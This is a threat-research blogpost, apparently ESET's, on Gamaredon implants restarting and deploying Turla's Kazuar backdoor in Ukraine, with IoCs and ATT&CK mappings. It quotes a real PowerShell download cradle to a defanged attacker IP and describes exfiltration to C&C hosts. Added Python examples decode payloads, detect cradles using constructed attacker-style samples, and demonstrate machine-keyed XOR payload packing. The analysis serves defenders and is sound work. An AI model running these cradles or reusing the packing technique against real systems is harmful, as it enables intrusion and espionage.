In this blogpost, we uncover the first known cases of collaboration between Gamaredon and Turla, in Ukraine.
Key points of this blogpost:
- In February 2025, we discovered that the Gamaredon tool PteroGraphin was used to restart Turla's Kazuar backdoor on a machine in Ukraine.
- In April and June 2025, we detected that Kazuar v2 was deployed using the Gamaredon tools PteroOdd and PteroPaste.
- These discoveries lead us to believe with high confidence that Gamaredon is collaborating with Turla.
- Turla's victim count is very low compared to the number of Gamaredon compromises, suggesting that Turla selects only the most valuable machines.
- Both groups are affiliated with the FSB, Russia's main domestic intelligence and security agency.
Threat actor profiles
Gamaredon
Gamaredon has been active since at least 2013. It is responsible for many attacks, mostly against Ukrainian governmental institutions, as evidenced over the years in various reports from CERT-UA and from other official Ukrainian bodies. Gamaredon has been attributed by the Security Service of Ukraine (SSU) to Center 18 of Information Security of the FSB, operating out of occupied Crimea. We believe this group to be collaborating with another threat actor that we discovered and named InvisiMole.
Turla
Turla, also known as Snake, is an infamous cyberespionage group that has been active since at least 2004, possibly extending back into the late 1990s. It is considered part of the FSB. It mainly focuses on high-profile targets, such as governments and diplomatic entities, in Europe, Central Asia, and the Middle East. It is known for having breached major organizations such as the US Department of Defense in 2008 and the Swiss defense company RUAG in 2014. Over the past few years, we have documented a large part of Turla's arsenal on the WeLiveSecurity blog and in private reports.
Overview
In February 2025, via ESET telemetry, we detected four different Gamaredon-Turla co-compromises in Ukraine. On those machines, Gamaredon deployed a range of tools, including PteroLNK, PteroStew, PteroOdd, PteroEffigy, and PteroGraphin, while Turla only deployed Kazuar v3.
On one of those machines, we were able to capture a payload showing that Turla is able to issue commands via Gamaredon implants. PteroGraphin was used to restart Kazuar, probably after Kazuar crashed or was not launched automatically. Thus, PteroGraphin was likely used as a recovery method by Turla. This is the first time that we have been able to link these two groups together via technical indicators (see First chain: Restart of Kazuar v3).
Because, in all four cases, the ESET endpoint product was installed after the compromises, we are unable to pinpoint the exact compromise method. However, Gamaredon is known for using spearphishing and malicious LNK files on removable drives (as described in our recent blogpost), so we presume that one of these is the most likely compromise vector.
In April and June 2025, we detected Kazuar v2 installers being deployed directly by Gamaredon tools (see Second chain: Deployment of Kazuar v2 via PteroOdd and Third chain: Deployment of Kazuar v2 via PteroPaste). This shows that Turla is actively collaborating with Gamaredon to gain access to specific machines in Ukraine.
Victimology
Over the past 18 months we have detected Turla on seven machines in Ukraine. We believe that Gamaredon compromised the first four machines in January 2025, while Turla deployed Kazuar v3 in February 2025. In all cases, the ESET endpoint product was only installed after both compromises.
It is worth noting that, prior to this, the last time we detected a Turla compromise in Ukraine was in February 2024.
All those elements, and the fact that Gamaredon is compromising hundreds if not thousands of machines, suggest that Turla is only interested in specific machines, probably ones containing highly sensitive intelligence.
Attribution
Gamaredon
In those compromises, we detected PteroLNK, PteroStew, and PteroGraphin, which we believe are exclusive to Gamaredon.
Turla
Similarly, for Turla, we detected the use of Kazuar v2 and Kazuar v3, which we believe are exclusive to that group.
Gamaredon-Turla collaboration hypotheses
In 2020, we showed that Gamaredon provided access to InvisiMole (see our white paper), so it is not the first time that Gamaredon has collaborated with another Russia-aligned threat actor.
On the other hand, Turla is known for hijacking other threat actors' infrastructure to get an initial foothold in its targets' networks. Over the past years, several cases have been publicly documented:
- In 2019, Symantec published a blogpost showing that Turla hijacked OilRig (an Iran-aligned group) infrastructure to spy on a Middle Eastern target.
- In 2023, Mandiant published a blogpost showing that Turla reregistered expired Andromeda C&C domains in order to compromise targets in Ukraine.
- In 2024, Microsoft published two blogposts (first and second) showing that Turla hijacked the cybercrime botnet Amadey and infrastructure of the cyberespionage group SideCopy (a Pakistan-aligned group) in order to deploy Kazuar.
Note that both Gamaredon and Turla are part of the Russian Federal Security Service (FSB). Gamaredon is believed to be operated by officers of Center 18 of the FSB (aka the Center for Information Security) in Crimea (see this report from the Security Service of Ukraine), which is part of the FSB's counterintelligence service. As for Turla, the UK's NCSC attributes the group to Center 16 of the FSB, which is Russia's main signals intelligence (SIGINT) agency.
Therefore, we propose three hypotheses to explain our observations:
- Very likely: Given that both groups are part of the Russian FSB (albeit in two different Centers), Gamaredon provided access to Turla operators so that they could issue commands on a specific machine to restart Kazuar, and deploy Kazuar v2 on some others.
- Unlikely: Turla compromised Gamaredon infrastructure and leveraged this access to regain access to a machine in Ukraine. Since PteroGraphin contains a hardcoded token that allows modifying the C&C pages, this possibility cannot be fully discarded. However, it would mean that Turla was able to reproduce the full Gamaredon chain.
- Unlikely: Gamaredon has access to Kazuar and deploys it on very specific machines. Given Gamaredon's noisy approach, we don't think it would be that careful, deploying Kazuar on only a very limited set of victims.
Geopolitical context
From an organizational perspective, it is worth noting that the two entities commonly associated with Turla and Gamaredon have a long history of reported collaboration, which can be traced back to the Cold War era.
The FSB's Center 16 (which is believed to harbor Turla) is a direct heir to the KGB's 16th Directorate, which was primarily responsible for foreign SIGINT collection – the persistence of the number 16 is in fact regarded by observers as a sign of the FSB leadership's desire to emphasize a historical lineage. Center 18 (which is usually associated with Gamaredon) maintains a rough alignment with the KGB's Second Chief Directorate, which was responsible for internal security within the Soviet Union. During the Soviet era, both organizations frequently worked hand in hand, sharing responsibilities for monitoring foreign embassies on Russian soil, for example.
Then and now, such collaborations reflect the Russian strategic culture and philosophy of a natural continuity between internal security and national defense. Although Center 16 is still tasked with foreign intelligence collection and Center 18 is theoretically part of the FSB's counterintelligence apparatus, both entities seem to maintain some mission overlaps – especially with regard to former Soviet republics. In 2018, the Security Service of Ukraine (SBU) had already observed Centers 16 and 18 apparently conducting a joint cyberespionage campaign (named SpiceyHoney). The 2022 full-scale invasion of Ukraine has likely reinforced this convergence, with ESET data clearly showing Gamaredon and Turla activity focusing on the Ukrainian defense sector in recent months.
Although the Russian intelligence community is known for its fierce internal rivalries, there are indications that such tensions mostly apply to interservice relations rather than to intra-agency interactions. In this context, it is perhaps not entirely surprising that APT groups operating within these two FSB Centers are observed cooperating to some extent.
First chain: Restart of Kazuar v3
In February 2025, we detected the execution of Kazuar by PteroGraphin and PteroOdd on a machine in Ukraine. In this section we detail the exact chain that we observed.
Timeline
The full timeline for this machine is the following:
- 2025-01-20: Gamaredon deployed PteroGraphin on the machine. Note that the date comes from the file creation timestamp provided by Windows, which could have been tampered with.
- 2025-02-11: Turla deployed Kazuar v3 on the machine. Note that the date comes from the file creation timestamp provided by Windows, which could have been tampered with.
- 2025-02-27 15:47:39 UTC: PteroGraphin downloaded PteroOdd.
- 2025-02-27 15:47:56 UTC: PteroOdd downloaded a payload, which executed Kazuar.
- 2025-02-28 15:17:14 UTC: PteroOdd downloaded another payload, which also executed Kazuar.
Hereafter, we assume these dates to be unaltered.
Details of the events
Since January 20th, 2025, PteroGraphin (see Figure 1) was present on the machine at %APPDATA%\x86.ps1. It is a downloader that provides an encrypted channel for delivering payloads via Telegra.ph, a web service operated by Telegram that allows easy creation of web pages. Note that PteroGraphin contains a token to edit the Telegra.ph page, so anyone with knowledge of this token (Turla, for example, albeit unlikely) could manipulate the contents.

On February 27th, 2025, at 15:47:39 UTC, as shown in Figure 2, we detected a reply from https://api.telegra[.]ph/getPage/SecurityHealthSystray-01-20?return_content=true.

The data in the children nodes can be decrypted using the hardcoded 3DES key and IV from the PteroGraphin script above, which gives:
powershell -windowStyle hidden -EncodedCommand
The decoded payload is another PowerShell downloader that we named PteroOdd, shown in Figure 3.

On February 27th, 2025 at 15:47:56 UTC, we detected a request to https://api.telegra[.]ph/getPage/dinoasjdnl-02-27?return_content=true; the reply is shown in Figure 4. Note that the replies for PteroOdd are not encrypted.

The decoded command is shown in Figure 5.

The payload first uploads the victim's computer name and the system drive's volume serial number to the Cloudflare Workers subdomain https://lucky-king-96d6.mopig92456.workers[.]dev.
What is most interesting is the last line:
Start-Process -FilePath "C:\Users\[redacted]\AppData\Local\Programs\Sony\Audio\Drivers\vncutil64.exe"
This is the path of the application that is run to execute Kazuar via DLL side-loading. The ESET endpoint product detected a KERNEL Kazuar v3 payload (agent_label AGN-RR-01) in memory, loaded in this process. It is not clear to us why Turla operators needed PteroGraphin to launch Kazuar, but it is possible that Kazuar somehow stopped working after the ESET product was installed and that they had to restart the implant. Note that we did not see Gamaredon downloading Kazuar; it had been present on the machine since February 11th, 2025, before the ESET product was installed.
Then, on February 28th, 2025 at 15:17:14 UTC, we detected another, similar PowerShell script, shown in Figure 6.

The first lines and the Cloudflare Workers subdomain are identical. It starts the same vncutil64.exe but also a second executable, LaunchGFExperience.exe, which side-loads LaunchGFExperienceLOC.dll – the Kazuar loader. We then detected in memory, in the LaunchGFExperience.exe process, another KERNEL Kazuar v3 payload (agent_label AGN-XX-01). It is not clear why two different KERNEL Kazuar v3 payloads were present on the same machine.
Finally, an HTTP POST request containing the list of running processes was sent to https://eset.ydns[.]eu/post.php. The Turla operators most likely wanted confirmation that Kazuar had been successfully launched.
On March 10th, 2025 at 07:05:32 UTC, we detected another sample of PteroOdd, which uses the C&C URL https://api.telegra[.]ph/getPage/canposgam-03-06?return_content=true. This sample was detected on a different machine in Ukraine, on which Kazuar was also present.
The decoded payload is shown in Figure 7 and shows that it also uses eset.ydns[.]eu, while not interacting with any Turla sample.
On the other hand, we noted that the downloaded payload uploads the following pieces of information to https://eset.ydns[.]eu/post.php:
However, we are not aware of any .NET application currently being used by Gamaredon, while several are used by Turla, including Kazuar. Thus, it is possible that these uploaded pieces of information are for Turla, and we assess with medium confidence that the domain eset.ydns[.]eu is controlled by Turla.

The additional base64-encoded PowerShell command is a new downloader that abuses api.gofile[.]io; we named it PteroEffigy.
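The decoding walked through above for Figures 4, 5 and 7 (base64 text in the Telegra.ph children nodes, a -EncodedCommand launcher whose argument is UTF-16LE, and a further base64-encoded script embedded inside it) is mechanical enough to script. The following Python is an added example and not ESET's tooling or any of the actual payloads: it assumes the documented Telegra.ph getPage response shape (result.content as a list of nodes with children), and the reply, scripts, hostnames and file path it decodes are constructed for the example.

```python
"""Added example (not ESET's code, not the real payloads): peel a PteroOdd-style
Telegra.ph reply down to its innermost script and pull out the indicators."""
import base64
import json
import re

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"\)\];]+")
FILEPATH_RE = re.compile(r"-FilePath\s+[\"']([^\"']+)[\"']")
ENCODED_CMD = re.compile(r"-EncodedCommand\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def _text_leaves(node):
    """Yield every string leaf of a Telegra.ph content tree (nodes are dicts with 'children')."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, list):
        for child in node:
            yield from _text_leaves(child)
    elif isinstance(node, dict):
        yield from _text_leaves(node.get("children", []))


def _decode_blob(b64: str) -> str:
    """Base64-decode; use UTF-16LE when the bytes look like it (what -EncodedCommand expects)."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    if len(raw) >= 2 and raw[1] == 0:  # ASCII text stored as UTF-16LE has NUL high bytes
        return raw.decode("utf-16le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def _looks_like_text(s: str) -> bool:
    printable = sum(1 for ch in s if ch.isprintable() or ch in "\r\n\t")
    return bool(s) and printable / len(s) > 0.95


def peel_layers(script: str, depth: int = 0, max_depth: int = 5):
    """Return [script, inner, inner-of-inner, ...]: every embedded base64 blob that decodes to text."""
    layers = [script]
    if depth >= max_depth:
        return layers
    m = ENCODED_CMD.search(script)
    blobs = [m.group(1)] if m else B64_TOKEN.findall(script)
    for blob in blobs:
        try:
            inner = _decode_blob(blob)
        except (ValueError, UnicodeDecodeError):
            continue
        if _looks_like_text(inner):
            layers.extend(peel_layers(inner, depth + 1, max_depth))
    return layers


def analyze_telegraph_reply(reply_json: str) -> dict:
    """Decode a getPage reply: returns the decoded layers plus the URLs and Start-Process paths in them."""
    page = json.loads(reply_json)
    if not page.get("ok"):
        raise ValueError("Telegra.ph API error: %s" % page.get("error"))
    body = "".join(_text_leaves(page["result"]["content"])).strip()
    layers = peel_layers(_decode_blob(body))
    urls, paths = [], []
    for layer in layers:
        for u in URL_RE.findall(layer):
            if u not in urls:
                urls.append(u)
        for p in FILEPATH_RE.findall(layer):
            if p not in paths:
                paths.append(p)
    return {"layers": layers, "urls": urls, "paths": paths}


# --- Constructed sample reply (stand-ins, not the captured content) ---
EFFIGY_LIKE = "iex (New-Object Net.WebClient).DownloadString('https://stage.example.invalid/stage2.ps1')"
INNER_SCRIPT = (
    "$info = $env:COMPUTERNAME + '|' + (Get-CimInstance Win32_LogicalDisk -Filter \"DeviceID='C:'\").VolumeSerialNumber\n"
    "Invoke-RestMethod -Uri 'https://worker.example.invalid/' -Method Post -Body $info\n"
    "iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
    + base64.b64encode(EFFIGY_LIKE.encode()).decode() + "')))\n"
    "Start-Process -FilePath \"C:\\Users\\victim\\AppData\\Local\\Programs\\Vendor\\util64.exe\"\n"
)
LAUNCHER = "powershell -windowStyle hidden -EncodedCommand " + base64.b64encode(INNER_SCRIPT.encode("utf-16le")).decode()
SAMPLE_REPLY = json.dumps({
    "ok": True,
    "result": {"path": "constructed-01-01", "title": "x",
               "content": [{"tag": "p", "children": [base64.b64encode(LAUNCHER.encode()).decode()]}]},
})

if __name__ == "__main__":
    result = analyze_telegraph_reply(SAMPLE_REPLY)
    for i, layer in enumerate(result["layers"]):
        print("--- layer %d ---\n%s" % (i, layer))
    print("URLs:", result["urls"])
    print("Launched:", result["paths"])
```

Running it prints each decoded layer followed by the URLs and launched paths found across all of them. A PteroGraphin reply would first need the 3DES step described above; this example skips it because PteroOdd replies are not encrypted.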
Kazuar v3
Kazuar v3 is the latest branch of the Kazuar family, itself an advanced C# espionage implant that we believe has been used exclusively by Turla since it was first observed in 2016. Kazuar v2 and v3 are basically the same malware family and share the same codebase. However, some major changes have been introduced.
Kazuar v3 contains around 35% more lines of C# than Kazuar v2 and introduces additional network transport methods: over web sockets and Exchange Web Services. Kazuar v3 can have one of three roles (KERNEL, BRIDGE, or WORKER), and malware functionalities are divided among those roles. For example, only BRIDGE communicates with the C&C server.
Second chain: Deployment of Kazuar v2 via PteroOdd
On one of the Ukrainian machines mentioned in the previous section, we detected another interesting compromise chain on April 18th, 2025.
On April 18th, 2025 at 15:26:14 UTC, we detected a PteroOdd sample (a Gamaredon tool) downloading a payload from https://api.telegra[.]ph/getPage/scrsskjqwlbw-02-28?return_content=true. The downloaded script, shown in Figure 8, is similar to the payload described in the first chain, but contains an additional base64-encoded script, which is the PowerShell downloader PteroEffigy.

This PowerShell payload downloads another payload from https://eset.ydns[.]eu/scrss.ps1 and executes it.
scrss.ps1 turned out to be an installer for Turla's Kazuar v2, which was previously analyzed in detail by Unit 42. This shows that Gamaredon deployed Kazuar, most likely on behalf of Turla.
The Kazuar agent_label is AGN-AB-26 and the three C&C servers are:
- https://abrargeospatial[.]ir/wp-includes/fonts/wp-icons/index.php
- https://www.brannenburger-nagelfluh[.]de/wp-includes/style-engine/css/index.php
- https://www.pizzeria-mercy[.]de/wp-includes/images/media/bar/index.php
It is worth noting that Turla keeps using compromised WordPress servers as C&Cs for Kazuar.
Interestingly, it seems that Kazuar v2 is still maintained in parallel to Kazuar v3. For example, the recent updates to the backdoor commands in Kazuar v3 are also included in this AGN-AB-26 build.
Third chain: Deployment of Kazuar v2 via PteroPaste
On June 5th and 6th, 2025, we detected Gamaredon deploying a Turla implant on two machines in Ukraine. In both cases, Gamaredon's PteroPaste was caught trying to execute the simple PowerShell script shown in Figure 9.

The base64-encoded string is the following PowerShell downloader:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Net.WebClient).downloadString('https://91.231.182[.]187/ekrn.ps1');
The first statement makes .NET accept any server certificate, which is what lets an HTTPS download from a bare IP address succeed without a valid certificate; the second fetches the script and executes it in memory with iex.
The downloaded script ekrn.ps1 is very similar to scrss.ps1 mentioned in the second chain. It also drops and installs Kazuar v2.
Both samples have an agent_label of AGN-AB-27 and the C&C servers are the same as those in the sample from the second chain:
- https://www.brannenburger-nagelfluh[.]de/wp-includes/style-engine/css/index.php
- https://www.pizzeria-mercy[.]de/wp-includes/images/media/bar/index.php
- https://abrargeospatial[.]ir/wp-includes/fonts/wp-icons/index.php
ekrn.exe is a legitimate process of ESET endpoint security products, so Turla likely borrowed the name in order to fly under the radar. Also note that ekrn.ydns[.]eu resolves to 91.231.182[.]187.
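The one-line downloader above combines several traits that are cheap to detect in PowerShell script block logging (Event ID 4104): certificate validation switched off, an iex/downloadString cradle, a raw IP as the host, and a file name borrowed from a security product. As an added example that is not part of the ESET post, the following Python runs such checks over a handful of constructed script block entries; the IPs, page paths and file names in the samples are made up, and the vendor lookalike list is a minimal illustration, not a complete one.

```python
"""Added example, not from the ESET post: flag PowerShell download cradles of the
kind seen in the second and third chains, over constructed script block log entries."""
import ipaddress
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"\)\];]+", re.IGNORECASE)
# Minimal illustration of "security product name reused off the vendor's domain".
VENDOR_TOKENS = {"eset": "eset.com", "ekrn": "eset.com"}


def _is_ip_host(url: str) -> bool:
    try:
        ipaddress.ip_address(urlparse(url).hostname or "")
        return True
    except ValueError:
        return False


def _vendor_lookalike(url: str) -> bool:
    """Host or file name carries a vendor token but the host is not under the vendor's domain."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    fname = parsed.path.rsplit("/", 1)[-1].lower()
    for token, legit in VENDOR_TOKENS.items():
        if (token in host or token in fname) and host != legit and not host.endswith("." + legit):
            return True
    return False


RULES = [  # (name, severity, predicate over ScriptBlockText)
    ("tls_validation_disabled", "high",
     lambda s: re.search(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", s, re.I) is not None),
    ("download_cradle", "medium",
     lambda s: re.search(r"\b(iex|Invoke-Expression)\b", s, re.I) is not None
     and re.search(r"downloadstring|downloaddata|Invoke-WebRequest|Invoke-RestMethod", s, re.I) is not None),
    ("hidden_encoded_command", "medium",
     lambda s: re.search(r"-w(?:indowstyle)?\s+hidden", s, re.I) is not None
     and re.search(r"-e(?:ncodedcommand|nc)?\s+[A-Za-z0-9+/=]{20,}", s, re.I) is not None),
    ("telegraph_getpage", "medium", lambda s: "api.telegra.ph/getpage" in s.lower()),
    ("ip_literal_url", "low", lambda s: any(_is_ip_host(u) for u in URL_RE.findall(s))),
    ("security_vendor_lookalike", "medium", lambda s: any(_vendor_lookalike(u) for u in URL_RE.findall(s))),
]
SEVERITY = {name: sev for name, sev, _ in RULES}


def evaluate(script_text: str) -> list:
    """Names of the rules that match one ScriptBlockText value."""
    return [name for name, _, pred in RULES if pred(script_text)]


def verdict(matches: list) -> str:
    if any(SEVERITY[m] == "high" for m in matches) or len(matches) >= 2:
        return "alert"
    return "suspicious" if matches else "clean"


def scan(entries):
    """entries: iterable of (record_id, ScriptBlockText). Returns one dict per entry."""
    out = []
    for rid, text in entries:
        matches = evaluate(text)
        out.append({"id": rid, "rules": matches, "verdict": verdict(matches)})
    return out


# --- Constructed Event ID 4104 ScriptBlockText values (IPs, paths and names are made up) ---
SAMPLE_SCRIPT_BLOCKS = [
    ("sb-1", "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
             "iex(New-Object Net.WebClient).downloadString('https://203.0.113.10/ekrn.ps1');"),
    ("sb-2", "powershell -windowStyle hidden -EncodedCommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAA="),
    ("sb-3", "$r = Invoke-RestMethod 'https://api.telegra.ph/getPage/example-01-01?return_content=true'; "
             "iex $r.result.content[0].children[0]"),
    ("sb-4", "Invoke-WebRequest -Uri 'https://repository.eset.com/v1/agent_x64.msi' -OutFile C:\\Temp\\agent.msi"),
    ("sb-5", "Get-ChildItem C:\\Windows\\Temp | Where-Object Length -gt 1MB | Remove-Item"),
]

if __name__ == "__main__":
    for row in scan(SAMPLE_SCRIPT_BLOCKS):
        print("%-5s %-10s %s" % (row["id"], row["verdict"], ", ".join(row["rules"]) or "-"))
```

The benign entries (a vendor download from the vendor's own domain, a local cleanup script) stay clean, which is the point of keeping the single-signal rules at medium or low severity and only alerting on the certificate bypass or on two signals at once.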
Finally, we also found on VirusTotal a VBScript variant of the Kazuar v2 PowerShell installer. It was uploaded from Kyrgyzstan on June 5th, 2025. This suggests that Turla is going after targets outside Ukraine as well.
Conclusion
In this blogpost, we have shown how Turla was able to leverage implants operated by Gamaredon (PteroGraphin, PteroOdd, and PteroPaste) in order to restart Kazuar v3 and deploy Kazuar v2 on several machines in Ukraine. We now believe with high confidence that both groups – separately associated with the FSB – are cooperating and that Gamaredon is providing initial access to Turla.
For any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com. ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.
IoCs
A comprehensive list of indicators of compromise (IoCs) and samples can be found in our GitHub repository.
Files
| SHA-1 (truncated) | Filename | Detection | Description |
|---|---|---|---|
| 7DB790F75829D3E6207D | N/A | PowerShell/Pterodo.QB | PteroOdd. |
| 2610A899FE73B8F018D1 | N/A | PowerShell/Pterodo.QB | PteroOdd. |
| 3A24520566BBE2E262A2 | N/A | PowerShell/Pterodo.QB | PteroOdd. |
| DA7D5B9AB578EF648747 | scrss.ps1 | PowerShell/Turla.AI | Kazuar v2 installer. |
| D7DF1325F66E029F4B77 | N/A | MSIL/Turla.N.gen | Kazuar v2. |
| FF741330CC8D9624D791 | N/A | PowerShell/TrojanDo | PowerShell downloader executed by PteroPaste. |
| A7ACEE41D66B537D9004 | ekrn.ps1 | PowerShell/Turla.AJ | Kazuar v2 installer. |
| 54F2245E0D3ADEC566E4 | N/A | MSIL/Agent_AGen.CZQ | Kazuar v2. |
| 371AB9EB2A3DA44099B2 | ekrn.ps1 | PowerShell/Turla.AJ | Kazuar v2 installer. |
| 4A58365EB8F928EC3CD6 | N/A | MSIL/Turla.W | Kazuar v2. |
| 214DC22FA25314F9C0DD | Sandboxie.vbs | VBS/Turla.C | Kazuar v2 installer – VBScript variant. |
Network
| IP | Domain | Hosting provider | First seen | Details |
|---|---|---|---|---|
| N/A | lucky-king-96d6.mopig92456.workers[.]dev | N/A | 2025-02-28 | Cloudflare worker found in payloads downloaded by PteroOdd. |
| 64.176.173[.]164 | eset.ydns[.]eu | The Constant Company, LLC | 2025-03-01 | C&C server found in payloads downloaded by PteroOdd. |
| 85.13.145[.]231 | hauptschule-schw | Neue Medien Muennich GmbH | 2024-06-06 | Compromised WordPress site used as Kazuar C&C. |
| 91.231.182[.]187 | ekrn.ydns[.]eu | South Park Networks LLC | 2025-06-05 | C&C server in payloads downloaded by PteroPaste. |
| 185.118.115[.]15 | fjsconsultoria[.]com | Dream Fusion – IT Services, Lda | 2024-06-26 | Compromised WordPress site used as Kazuar C&C. |
| 77.46.148[.]242 | ingas[.]rs | TELEKOM SRBIJA a.d. | 2024-06-03 | Compromised WordPress site used as Kazuar C&C. |
| 168.119.152[.]19 | abrargeospatial[.]ir | Hetzner Online GmbH | 2023-11-13 | Compromised WordPress site used as Kazuar C&C. |
| 217.160.0[.]33 | www.brannenburger-nagelfluh[.]de | IONOS SE | 2019-06-06 | Compromised WordPress site used as Kazuar C&C. |
| 217.160.0[.]159 | www.pizzeria-mercy[.]de | IONOS SE | 2023-10-05 | Compromised WordPress site used as Kazuar C&C. |
MITRE ATT&CK techniques
This table was built using version 17 of the MITRE ATT&CK framework.
| Tactic | ID | Name | Description |
|---|---|---|---|
| Resource Development | T1583.001 | Acquire Infrastructure: Domains | Gamaredon or Turla registered a domain at a free dynamic DNS provider. |
| Resource Development | T1583.004 | Acquire Infrastructure: Server | Gamaredon or Turla rented a server at Vultr. |
| Resource Development | T1583.007 | Acquire Infrastructure: Serverless | Gamaredon created Cloudflare workers and Telegra.ph pages. |
| Resource Development | T1584.003 | Compromise Infrastructure: Virtual Private Server | Turla compromised WordPress websites. |
| Resource Development | T1608 | Stage Capabilities | Turla staged Kazuar installer scripts on its C&C servers. |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | PteroGraphin is developed in PowerShell. |
| Persistence | T1574.002 | Hijack Execution Flow: DLL Side-Loading | Kazuar loaders use DLL side-loading. |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | The Kazuar payload is XOR encrypted and all Kazuar strings are encrypted via substitution tables. |
| Defense Evasion | T1480.001 | Execution Guardrails: Environmental Keying | Kazuar loaders decrypt the payloads using the machine name as the key. |
| Defense Evasion | T1036.005 | Masquerading: Match Legitimate Name or Location | Kazuar loaders are located in legitimate-looking directories such as C:\Program Files (x86)\Brother Printer\App or %LOCALAPPDATA%\Programs\Sony\Audio. |
| Discovery | T1057 | Process Discovery | The PowerShell script starting Kazuar v3 sends the list of running processes to its C&C server. |
| Discovery | T1012 | Query Registry | The PowerShell script starting Kazuar v3 gets the PowerShell version from the registry. |
| Discovery | T1082 | System Information Discovery | The PowerShell script starting Kazuar v3 exfiltrates the last boot time, OS version, and OS architecture. |
| Discovery | T1083 | File and Directory Discovery | The PowerShell script starting Kazuar v3 lists files in the directories %TEMP% and %APPDATA%\Microsoft\Windows. |
| Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | PteroGraphin and Kazuar use HTTPS. |
| Command and Control | T1573.001 | Encrypted Channel: Symmetric Cryptography | PteroGraphin decrypts the C&C reply using 3DES. |
| Command and Control | T1102 | Web Service | Legitimate web services, such as Telegra.ph, were used in this campaign. |
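The T1480.001 and T1140 rows above note that the Kazuar loaders XOR-decrypt their payload with a key derived from the machine name, so the blob is useless on any other host, including a sandbox. The post does not describe the key derivation; the Python below is an added example, not Kazuar's code, that uses SHA-256 of the upper-cased machine name as an assumed stand-in and a constructed DOS-header-like payload. It shows the loader-side guardrail, analyst-side recovery given candidate hostnames from telemetry, and why a repeating-key XOR under a predictable header leaks the key regardless of the hostname.

```python
"""Added example, not Kazuar's code: environmental keying (T1480.001) with a
repeating-key XOR payload (T1140). The key derivation is an assumed stand-in."""
import hashlib
import itertools

KEY_LEN = 32
MAGIC = b"MZ\x90\x00"  # assumption: the loader checks for a DOS header before using the payload


def derive_key(machine_name: str) -> bytes:
    """Assumed derivation: SHA-256 of the upper-cased machine name (Windows names are case-insensitive)."""
    return hashlib.sha256(machine_name.upper().encode("utf-16le")).digest()[:KEY_LEN]


def xor_crypt(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ k for b, k in zip(data, itertools.cycle(key)))


def pack_for_host(payload: bytes, machine_name: str) -> bytes:
    """Operator side: the blob only decrypts correctly on the intended host."""
    return xor_crypt(payload, derive_key(machine_name))


def unpack_on_host(blob: bytes, machine_name: str):
    """Loader side: decrypt with the local name; refuse to run anything that is not a PE."""
    plain = xor_crypt(blob, derive_key(machine_name))
    return plain if plain.startswith(MAGIC) else None


def recover_with_candidates(blob: bytes, candidate_names):
    """Analyst side: with hostnames from telemetry, try each until the magic check passes."""
    for name in candidate_names:
        plain = unpack_on_host(blob, name)
        if plain is not None:
            return name, plain
    return None, None


def key_from_known_prefix(blob: bytes, known_prefix: bytes) -> bytes:
    """Why this guardrail is weak: a repeating key no longer than the predictable DOS header
    falls straight out of ciphertext XOR known plaintext, without knowing the machine name."""
    if len(known_prefix) < KEY_LEN:
        raise ValueError("need at least KEY_LEN bytes of known plaintext")
    return xor_crypt(blob[:KEY_LEN], known_prefix[:KEY_LEN])


# --- Constructed payload: a standard-looking 32-byte DOS header followed by filler ---
DOS_HEADER = (b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
              b"\xb8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00")
SAMPLE_PAYLOAD = DOS_HEADER + b"<constructed stand-in for the rest of an encrypted loader payload>"
TARGET_HOST = "WS-FINANCE-07"  # constructed hostname
BLOB = pack_for_host(SAMPLE_PAYLOAD, TARGET_HOST)

if __name__ == "__main__":
    print("right host  :", unpack_on_host(BLOB, TARGET_HOST) is not None)
    print("sandbox host:", unpack_on_host(BLOB, "SANDBOX-PC") is not None)
    print("recovered   :", recover_with_candidates(BLOB, ["SANDBOX-PC", "ws-finance-07"])[0])
    print("key leaked  :", key_from_known_prefix(BLOB, DOS_HEADER) == derive_key(TARGET_HOST))
```

For the analyst the practical lesson is that the victim's hostname (which the Gamaredon payloads above exfiltrate, and which endpoint telemetry records) is all that is needed to detonate such a blob; and for the same reason the guardrail only hides the payload from a sandbox, not from anyone who can read the first few dozen bytes of a PE header.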